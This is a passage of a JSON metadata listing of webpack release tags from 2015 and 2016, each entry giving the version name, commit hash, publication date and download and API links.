1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/w